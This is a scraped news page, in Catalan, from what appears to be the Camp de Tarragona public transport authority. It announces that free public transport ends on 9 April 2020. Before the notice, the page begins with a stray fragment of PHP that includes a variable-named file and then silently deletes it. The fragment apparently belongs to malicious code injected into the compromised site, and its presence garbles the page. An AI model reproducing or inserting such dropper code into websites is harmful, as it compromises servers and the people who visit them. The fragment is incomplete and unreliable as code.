");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> El 9 d'abril finalitza la gratuïtat del transport públic
Iconos cabecera

Highlights

  • T-12 CardT-12 Card
    For boys and girls from 4 to 12 years old

El 9 d'abril finalitza la gratuïtat del transport públic (08/04/2020)

En relació a la Resolució TES/798/2020 i de l’Acord del Consell d’Administració de l’ATM Camp de Tarragona, de data 31 de març de 2020, relatius a la gratuïtat de determinats serveis de transport públic de viatgers per carretera i ferroviari a Catalunya tant de l’àmbit integrat com no integrat tarifàriament, recordem que totes dues disposicions de gratuïtat del transport públic tenien de valdesa el mateix termini que la vigència dels permisos retribuïts temporals establerts pel RDL 10/2020, es a dir, fins demà, dijous 9 d'abril de 2020.

Atès que el període de vigència establert pels permisos retribuïts temporals establerts pel RDL 10/2020 no ha estat prorrogat, us recordem que la gratuïtat del transport públic establerta per les disposicions anteriorment referides finalitza el dia 9 d’abril de 2020, pel que a partir de les 00.00 hores del dia 10 d’abril de 2020 el transport públic torna a ser de pagament al preu ordinari establert per l’any 2020.

[Back to news]

 
Anselm Clavé, 1 43004 - Tarragona